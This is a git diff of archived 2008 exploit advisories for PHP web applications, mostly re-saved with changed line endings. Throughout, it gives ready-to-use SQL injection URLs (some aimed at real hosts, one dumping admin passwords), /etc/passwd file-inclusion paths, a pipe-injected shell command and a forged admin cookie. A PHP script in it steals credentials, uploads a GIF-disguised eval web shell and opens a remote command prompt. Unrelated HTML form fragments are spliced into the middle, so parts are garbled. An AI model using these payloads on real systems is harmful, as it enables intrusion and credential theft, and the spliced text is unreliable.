b/platforms/php/webapps/6549.txt index c1c81c503..5319c1aa3 100755 --- a/platforms/php/webapps/6549.txt +++ b/platforms/php/webapps/6549.txt 
@@ -1,48 +1,48 @@ -[~] Jetik Emlak ESA 2.0 System Script -[~] -[~] (KayitNo) multiple remote sql inj -[~] -[~] ---------------------------------------------------------- -[~] Discovered By: ZoRLu -[~] -[~] Date: 24.09.2008 -[~] -[~] contact: trt-turk@hotmail.com -[~] -[~] contact: zorlu@w.cn -[~] -[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( -[~] -[~] ----------------------------------------------------------- - -Exploit: - -http://localhost/script_path/diger.php?KayitNo=[SQL] - -http://localhost/script_path/sayfalar.php?KayitNo=[SQL] - -[SQL]= - --99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* - -Example: - -http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* - -Example 2: - -http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* - - - - -[~]---------------------------------------------------------------------- -[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs -[~] -[~] http://www.z0rlu.blogspot.com online : ) -[~] -[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com -[~] -[~]---------------------------------------------------------------------- - -# milw0rm.com [2008-09-24] +[~] Jetik Emlak ESA 2.0 System Script +[~] +[~] (KayitNo) multiple remote sql inj +[~] +[~] ---------------------------------------------------------- +[~] Discovered By: ZoRLu +[~] +[~] Date: 24.09.2008 +[~] +[~] contact: trt-turk@hotmail.com +[~] +[~] contact: zorlu@w.cn +[~] +[~] N0T: YALNIZLIK, YiTiRDi ANLAMINI YALNIZLIGIMDA : ( ( +[~] +[~] ----------------------------------------------------------- + +Exploit: + +http://localhost/script_path/diger.php?KayitNo=[SQL] + +http://localhost/script_path/sayfalar.php?KayitNo=[SQL] + +[SQL]= + 
+-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* + +Example: + +http://www.jetik.net/esa/diger.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* + +Example 2: + +http://www.jetik.net/esa/sayfalar.php?KayitNo=-99999999+union+select+null,null,concat(user(),0x3a,database(),0x3a,version()),null,null/* + + + + +[~]---------------------------------------------------------------------- +[~] Greetz tO: str0ke, FaLCaTa, ProgenTR, Ryu, Phantom Orchid, edish, SON-KRAL & all Muslims HaCkeRs +[~] +[~] http://www.z0rlu.blogspot.com online : ) +[~] +[~] home: yildirimordulari.org & r00tsecurity.org & darkc0de.com +[~] +[~]---------------------------------------------------------------------- + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6551.txt b/platforms/php/webapps/6551.txt index 7d9cf4983..c497d2377 100755 --- a/platforms/php/webapps/6551.txt +++ b/platforms/php/webapps/6551.txt 
@@ -1,51 +1,50 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ############################################################### - # [ emergecolab 1.0 ] Local File Inclusion Vulnerability # - ############################################################### - # - # Script site: http://emerge2004.net/software.php - # Download: http://eduforge.org/projects/emergecolab/ - # - # Vuln: - # http://site.com/emerge-1.0/connect/index.php?sitecode=../../../../../../../etc/passwd%00 - # - # - # Bug: ./emerge-1.0/connect/init.inc (lines: 23-30) - # - # ... - # if (isset($_GET["sitecode"])) { - # #first load the global settings - # include ("conf/global.conf"); - # #echo "got get var"; - # $_SESSION["sitecode"]=$_GET["sitecode"]; - # #set the session variable with the site folder for now just to default - # $_SESSION['sitefolder']='site'; - # include ("conf/".strtolower($_GET["sitecode"]).".conf"); // LFI - # ... - # - # - # Bug: (for example) ./emerge-1.0/connect/index.php (line: 2) - # - # ... - # require ("init.inc"); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-24] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ############################################################### + # [ emergecolab 1.0 ] Local File Inclusion Vulnerability # + ############################################################### + # + # Script site: http://emerge2004.net/software.php + # Download: http://eduforge.org/projects/emergecolab/ + # + # Vuln: + # http://site.com/emerge-1.0/connect/index.php?sitecode=../../../../../../../etc/passwd%00 + # + # + # Bug: ./emerge-1.0/connect/init.inc (lines: 23-30) + # + # ... + # if (isset($_GET["sitecode"])) { + # #first load the global settings + # include ("conf/global.conf"); + # #echo "got get var"; + # $_SESSION["sitecode"]=$_GET["sitecode"]; + # #set the session variable with the site folder for now just to default + # $_SESSION['sitefolder']='site'; + # include ("conf/".strtolower($_GET["sitecode"]).".conf"); // LFI + # ... + # + # + # Bug: (for example) ./emerge-1.0/connect/index.php (line: 2) + # + # ... + # require ("init.inc"); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6552.txt b/platforms/php/webapps/6552.txt index 84ff4ac42..2e9674e0e 100755 --- a/platforms/php/webapps/6552.txt +++ b/platforms/php/webapps/6552.txt 
@@ -1,47 +1,46 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################## - # [ mailwatch <= 1.0.4 ] Local File Inclusion Vulnerability # - ################################################################## - # - # Script site: http://sourceforge.net/projects/mailwatch/ - # - # Vuln: - # http://site.com/[mailwatch-1.0.4]/mailscanner/docs.php?doc=../../../../../../../etc/passwd%00 - # - # - # Bug: ./mailwatch-1.0.4/mailscanner/docs.php (lines: 23-34) - # - # ... - # if (isset($_GET[doc])) { - # include("docs/".$_GET[doc].".html"); - # } else { - # echo "
    + Benutzerinformationen +
    Benutzername: 
    Benutzergruppe:  + +

    + Zusätzliche Informationen +
    Geschlecht:  + + +
    Geburtstag:  + + + + + +
    Benutzertext: "; - print ""; - $res=curl("$url/images/emoticons/sphp.php","z=$eval"); - $res=strstr($res,"GIF89a"); - print substr($res,41);exit; -} - -if (strlen($url)>10) -{ - print "\n
    Trying to Get /config/users.php...";flush(); - $res=curl($url."/config/users.php",""); - if (strstr($res,'|')) print "Done!\n\n$res"; - else error("\n\nUsername & Password Not Found\n\n$res"); - - print "\n
    Trying to Get Username & Password...";flush(); - $res=str_replace("\r\n","\n",$res); - $res=substr($res,strpos($res,"\n\n")+2); - $line=explode("\n",$res);$n=count($line)-1; - if ($n) { - print "\nDone! Found - $n users:\n"; - for ($x=0;$x<$n;$x++){ - $up=explode("|",$line[$x]);$user[$x]=$up[1];$pass[$x]=substr($up[2],0,2); - print "\nUsername - ".$up[1]."\tPassword - ".$up[2]; - } - } - - print "\n
    Trying to Login...";flush(); - $postvar="user=$user[0]&pass=$pass[0]&"; - $res=curl($url."/login_cgi.php","$postvar"); - $cook=strstr($res,'Set-Cookie: sid='); - $cook=substr($cook,12,strpos($cook,';')-12); - if ($cook) print "\n\nDone... Cookie - $cook";else error("\n

    Error To Login

    \n\n\n$res"); - - print "\n
    Trying to Upload Emoticon...";flush(); - $buf="R0lGODlhAQABAIAAAP///wAAACH5BAEUAAAALAAAAAABAAEAAAICRAE8PyBldmFsKHN0cmlwc2xhc2hlcygkX1BPU1Rbel0pKTtleGl0Oz8+Ow=="; - if (@filesize('sphp.php')!=82){ - $f=fopen('sphp.php',"w");fwrite($f,base64_decode($buf));fclose($f); - } - $f=getcwd()."/sphp.php"; - $res=curl($url."/emoticons.php",array('user_emot'=>"@$f")); - if (strstr($res,"Success!")) print "\n\nDone! Exploit path - $url/images/emoticons/sphp.php"; else error("\n

    Error To Upload

    \n\n\n$res"); - - print "\n
    Trying to Exploit...";flush(); - $res=curl($url."/images/emoticons/sphp.php","z=print 20080824;"); - if (strstr($res,"20080824")) print "\n\nDone! Exploit Working!"; else error("\n

    Error To Exploit

    \n\n\n$res"); - - print "\n
    Trying to Logout...";flush(); - $res=curl($url."/logout.php",""); - if (strstr($res,"You are now logged out")) print "\n\nDone!"; else error("\n

    Error To Logout

    \n\n\n$res"); - print "\nEnter PHP Command:\n"; -} -print ""; -?> - -# milw0rm.com [2008-08-26] +3) + curl_setopt ($ch, CURLOPT_COOKIE, "$cook"); + $res = curl_exec ($ch);$err=curl_error ( $ch );if ($err) print "
    $err
    "; + curl_close($ch); + return $res; +} + +function error($msg){ + print "
    $msg
    \n

    Not Exploitable";exit; +} + +extract($_POST);extract($_GET); + +print "
    URL:
    "; +if (strlen($eval)>3){ + $eval=stripslashes($eval); + print "\nEnter PHP Command:\n

    $data[description]
    $data[description]
    \n"; - # echo " \n"; - # echo " \n"; - # echo " \n"; - # echo "
    \n"; - # echo "

    Documentation

    \n"; - # echo " This page does not require authentication, so you can put links to your site documentation here and allow your users to access it if you wish."; - # echo "
    \n"; - # } - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-24] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################## + # [ mailwatch <= 1.0.4 ] Local File Inclusion Vulnerability # + ################################################################## + # + # Script site: http://sourceforge.net/projects/mailwatch/ + # + # Vuln: + # http://site.com/[mailwatch-1.0.4]/mailscanner/docs.php?doc=../../../../../../../etc/passwd%00 + # + # + # Bug: ./mailwatch-1.0.4/mailscanner/docs.php (lines: 23-34) + # + # ... + # if (isset($_GET[doc])) { + # include("docs/".$_GET[doc].".html"); + # } else { + # echo "\n"; + # echo " \n"; + # echo " \n"; + # echo " \n"; + # echo "
    \n"; + # echo "

    Documentation

    \n"; + # echo " This page does not require authentication, so you can put links to your site documentation here and allow your users to access it if you wish."; + # echo "
    \n"; + # } + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6553.txt b/platforms/php/webapps/6553.txt index 2fbcc4b58..df59627a3 100755 --- a/platforms/php/webapps/6553.txt +++ b/platforms/php/webapps/6553.txt 
@@ -1,39 +1,38 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################### - # [ PHPcounter <= 1.3.2 ] Local File Inclusion Vulnerability # - ################################################################### - # - # Script: "A multi-account real time web-site counter in PHP/MySQL with lots of different statistics of the visitors." - # - # Script site: http://phpcounter.sourceforge.net/ - # Download: http://sourceforge.net/projects/phpcounter/ - # - # Vuln: - # http://site.com/[phpcounter.1.3.2]/defs.php?l=../../../../../../../etc/passwd%00 - # - # - # Bug: ./phpcounter.1.3.2/defs.php (line: 49) - # - # ... - # @include("langs/$_GET[l].php"); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-24] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################### + # [ PHPcounter <= 1.3.2 ] Local File Inclusion Vulnerability # + ################################################################### + # + # Script: "A multi-account real time web-site counter in PHP/MySQL with lots of different statistics of the visitors." 
+ # + # Script site: http://phpcounter.sourceforge.net/ + # Download: http://sourceforge.net/projects/phpcounter/ + # + # Vuln: + # http://site.com/[phpcounter.1.3.2]/defs.php?l=../../../../../../../etc/passwd%00 + # + # + # Bug: ./phpcounter.1.3.2/defs.php (line: 49) + # + # ... + # @include("langs/$_GET[l].php"); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6555.txt b/platforms/php/webapps/6555.txt index 6113e3115..185b0ffbe 100755 --- a/platforms/php/webapps/6555.txt +++ b/platforms/php/webapps/6555.txt 
@@ -1,57 +1,57 @@ -################################################################ -# .___ __ _______ .___ # -# __| _/____ _______| | __ ____ \ _ \ __| _/____ # -# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # -# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # -# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # -# \/ \/ \/ # -# ___________ ______ _ __ # -# _/ ___\_ __ \_/ __ \ \/ \/ / # -# \ \___| | \/\ ___/\ / # -# \___ >__| \___ >\/\_/ # -# est.2007 \/ \/ forum.darkc0de.com # -################################################################ -# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z -beenu- DON # -#-OutLawz- P47tr1ck- FeDeReR- MAGE- JeTFyrE-FunctionSys-jappan # -# and all darkc0de members ---# -################################################################ -# -# Author: r45c4l (Special thanks to congrallion) -# -# Home : www.darkc0de.com -# -# Email : r45c4l@hotmail.com -# -# Share the c0de! -# -################################################################ -# -# Title: Jadu CMS for Government (recruit_details.php) Remote SQL Inj -# -# -# Vendor: http://www.jadu.co.uk/site/index.php -# -# -# -########################################################### -# -# d0rk:inurl:site/scripts/recruit_details.php?id -# d0rk:inurl:"recruit_details.php?id=" -# -########################################################### - - POC 1: - - http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12-- - - POC 2: - - http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+JaduAdministrators-- - - -########################################################### -# -# Bug discovered : 24 Sep.2008 -########################################################### - -# milw0rm.com [2008-09-24] +################################################################ +# .___ __ _______ .___ # +# __| _/____ _______| | 
__ ____ \ _ \ __| _/____ # +# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ # +# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ # +# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ # +# \/ \/ \/ # +# ___________ ______ _ __ # +# _/ ___\_ __ \_/ __ \ \/ \/ / # +# \ \___| | \/\ ___/\ / # +# \___ >__| \___ >\/\_/ # +# est.2007 \/ \/ forum.darkc0de.com # +################################################################ +# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z -beenu- DON # +#-OutLawz- P47tr1ck- FeDeReR- MAGE- JeTFyrE-FunctionSys-jappan # +# and all darkc0de members ---# +################################################################ +# +# Author: r45c4l (Special thanks to congrallion) +# +# Home : www.darkc0de.com +# +# Email : r45c4l@hotmail.com +# +# Share the c0de! +# +################################################################ +# +# Title: Jadu CMS for Government (recruit_details.php) Remote SQL Inj +# +# +# Vendor: http://www.jadu.co.uk/site/index.php +# +# +# +########################################################### +# +# d0rk:inurl:site/scripts/recruit_details.php?id +# d0rk:inurl:"recruit_details.php?id=" +# +########################################################### + + POC 1: + + http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12-- + + POC 2: + + http://www.site.com/site/scripts/recruit_details.php?id=null+union+select+1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12+from+JaduAdministrators-- + + +########################################################### +# +# Bug discovered : 24 Sep.2008 +########################################################### + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6556.txt b/platforms/php/webapps/6556.txt index 8c46a529d..c034b4176 100755 --- a/platforms/php/webapps/6556.txt +++ b/platforms/php/webapps/6556.txt 
@@ -1,15 +1,15 @@ -################################################################################## -## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability -## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz -## Demo : http://gyrbo.madoka.be/web-cp/ -## Vuln : -## } -## if ($tf = fopen($filelocation, "r")) { -## // Date in the past -################################################################################## -## POC : -## http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php -## Open By Mozilla Firefox -################################################################################## - -# milw0rm.com [2008-09-24] +################################################################################## +## webcp 0.5.7 (sendfile.php filelocation) Remote File Disclosure Vulnerability +## Script : http://www.web-cp.net/releases/webcp-0.5.7.tar.gz +## Demo : http://gyrbo.madoka.be/web-cp/ +## Vuln : +## } +## if ($tf = fopen($filelocation, "r")) { +## // Date in the past +################################################################################## +## POC : +## http://gyrbo.madoka.be/web-cp/sendfile.php?filelocation=config.inc.php +## Open By Mozilla Firefox +################################################################################## + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6557.txt b/platforms/php/webapps/6557.txt index 81f75bcf5..86882035f 100755 --- a/platforms/php/webapps/6557.txt +++ b/platforms/php/webapps/6557.txt 
@@ -1,30 +1,30 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -adnforum <= 1.0b / Insecure Cookie Handling Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -$ Program: adnforum -$ Version: <= 1.0b -$ File affected: index.php -$ Download: http://sourceforge.net/projects/adnforum/ - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - - -Cookie is base64 based and the ascii format used is: -user:23ed4e45887ad4311ff654bd4aab6540:user:0 -user:md5 pass:user:0 - -Programmer forgot to check the pass and only use the nick to autenticate -the user. - -You can create a fake cookie likes this: -sysop:000000000000000000000000000000:sysop:0 - -In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA - -Exploit: -javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA" - -# milw0rm.com [2008-09-24] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +adnforum <= 1.0b / Insecure Cookie Handling Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +$ Program: adnforum +$ Version: <= 1.0b +$ File affected: index.php +$ Download: http://sourceforge.net/projects/adnforum/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + + +Cookie is base64 based and the ascii format used is: +user:23ed4e45887ad4311ff654bd4aab6540:user:0 +user:md5 pass:user:0 + +Programmer forgot to check the pass and only use the nick to autenticate +the user. + +You can create a fake cookie likes this: +sysop:000000000000000000000000000000:sysop:0 + +In base64: c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA + +Exploit: +javascript:document.cookie = "fpusuario=c3lzb3A6MDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwMDAwOnN5c29wOjA" + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6558.txt b/platforms/php/webapps/6558.txt index e90e32bf7..33e27b0ea 100755 --- a/platforms/php/webapps/6558.txt +++ b/platforms/php/webapps/6558.txt 
@@ -1,46 +1,45 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ################################################################### - # [ barcodegen <= 2.0.0 ] Local File Inclusion Vulnerability # - ################################################################### - # - # Script: "Barcode Generator 1D" - # - # Script site: http://www.barcodephp.com/ - # Download: http://www.barcodephp.com/download.php - # - # Vuln: - # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00 - # - # - # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8) - # - # ... - # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1']) - # && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) { - # require('config.php'); - # require($class_dir.'/BCGColor.php'); - # require($class_dir.'/BCGBarcode.php'); - # require($class_dir.'/BCGDrawing.php'); - # require($class_dir.'/BCGFont.php'); - # if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) { // LFI - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-24] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
'[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ################################################################### + # [ barcodegen <= 2.0.0 ] Local File Inclusion Vulnerability # + ################################################################### + # + # Script: "Barcode Generator 1D" + # + # Script site: http://www.barcodephp.com/ + # Download: http://www.barcodephp.com/download.php + # + # Vuln: + # http://site.com/[barcodegen.1d-v2.0.0]/html/image.php?t=1&r=1&text=1&f1=1&f2=1&o=1&a1=1&a2=1&code=/../../../../../../../etc/passwd%00 + # + # + # Bug: ./barcodegen.1d-v2.0.0/html/image.php (lines: 2-8) + # + # ... + # if(isset($_GET['code']) && isset($_GET['t']) && isset($_GET['r']) && isset($_GET['text']) && isset($_GET['f1']) + # && isset($_GET['f2']) && isset($_GET['o']) && isset($_GET['a1']) && isset($_GET['a2'])) { + # require('config.php'); + # require($class_dir.'/BCGColor.php'); + # require($class_dir.'/BCGBarcode.php'); + # require($class_dir.'/BCGDrawing.php'); + # require($class_dir.'/BCGFont.php'); + # if(include($class_dir . '/BCG' . $_GET['code'] . '.barcode.php')) { // LFI + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6559.txt b/platforms/php/webapps/6559.txt index 2cd884206..afce084f2 100755 --- a/platforms/php/webapps/6559.txt +++ b/platforms/php/webapps/6559.txt 
@@ -1,64 +1,63 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ######################################################### - # [ observer <= 0.3.2.1 ] Remote Command Execution # - ######################################################### - # - # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks." - # - # Script site: http://www.project-observer.org/ - # Download: http://freshmeat.net/projects/observer/ - # - # Vuln: - # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a - # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a - # - # - # Bug(1): ./observer-0.3.2.1/html/whois.php - # - # ... - # $output = `/usr/bin/whois $_GET[query] | grep -v \%`; - # $output = trim($output); - # echo("
    $output
    "); - # ... - # - # - # Bug(2): ./observer-0.3.2.1/html/netcmd.php - # - # ... - # switch ($_GET[cmd]) { - # case 'whois': - # $output = `/usr/bin/whois $_GET[query] | grep -v \%`; - # break; - # case 'ping': - # $output = `/bin/ping $_GET[query]`; - # break; - # case 'tracert': - # $output = `/usr/sbin/traceroute $_GET[query]`; - # break; - # case 'nmap': - # $output = `/usr/bin/nmap $_GET[query]`; - # break; - # } - # $output = trim($output); - # echo("
    $output
    "); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-24] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ######################################################### + # [ observer <= 0.3.2.1 ] Remote Command Execution # + ######################################################### + # + # Script: "Observer is an autodiscovering PHP/MySQL/SNMP/CDP based network management system focused primarily on Cisco and Linux/BSD networks." + # + # Script site: http://www.project-observer.org/ + # Download: http://freshmeat.net/projects/observer/ + # + # Vuln: + # (1) http://site.com/[observer-0.3.2.1]/whois.php?query=|uname -a + # (2) http://site.com/[observer-0.3.2.1]/netcmd.php?cmd=nmap&query=|uname -a + # + # + # Bug(1): ./observer-0.3.2.1/html/whois.php + # + # ... + # $output = `/usr/bin/whois $_GET[query] | grep -v \%`; + # $output = trim($output); + # echo("
    $output
    "); + # ... + # + # + # Bug(2): ./observer-0.3.2.1/html/netcmd.php + # + # ... + # switch ($_GET[cmd]) { + # case 'whois': + # $output = `/usr/bin/whois $_GET[query] | grep -v \%`; + # break; + # case 'ping': + # $output = `/bin/ping $_GET[query]`; + # break; + # case 'tracert': + # $output = `/usr/sbin/traceroute $_GET[query]`; + # break; + # case 'nmap': + # $output = `/usr/bin/nmap $_GET[query]`; + # break; + # } + # $output = trim($output); + # echo("
    $output
    "); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6562.txt b/platforms/php/webapps/6562.txt index 641cb277e..2d780eb25 100755 --- a/platforms/php/webapps/6562.txt +++ b/platforms/php/webapps/6562.txt 
@@ -1,50 +1,49 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ########################################################################## - # [ lansuite <= 3.4 beta r1363 ] Local File Inclusion Vulnerability # - ########################################################################## - # - # Script: "Lansuite - Webbased LAN-Party Management System" - # - # Script site: http://lansuite.orgapage.de - # Download: http://sourceforge.net/project/showfiles.php?group_id=105885 - # - # Vuln: - # http://site.com/[lansuite-3.4_beta_r1363]/index.php?design=../../../../../../../../../../etc/passwd%00 - # - # - # Bug: ./lansuite-3.4_beta_r1363/index.php (lines: 243-254) - # - # ... - # if (!$auth["design"]) $auth["design"] = "simple"; - # if (!file_exists("design/{$auth["design"]}/templates/index.php")) $auth["design"] = "simple"; - # $_SESSION["auth"]["design"] = $auth["design"]; - # if ($_GET['design'] and $_GET['design'] != 'popup' and $_GET['design'] != 'base') $auth['design'] = $_GET['design']; // [1] - # - # // Statistic Functions (for generating server- and usage-statistics) - # if ($db->success) $stats = new stats(); - # - # // Boxes - # if (!$IsAboutToInstall and !$_GET['contentonly'] and $_GET['design'] != 'base') include_once("modules/boxes/class_boxes.php"); - # - # if ($_GET['design'] != 'base') include_once('design/'. $auth['design'] .'/templates/index.php'); // [2] LFI - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-25] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. 
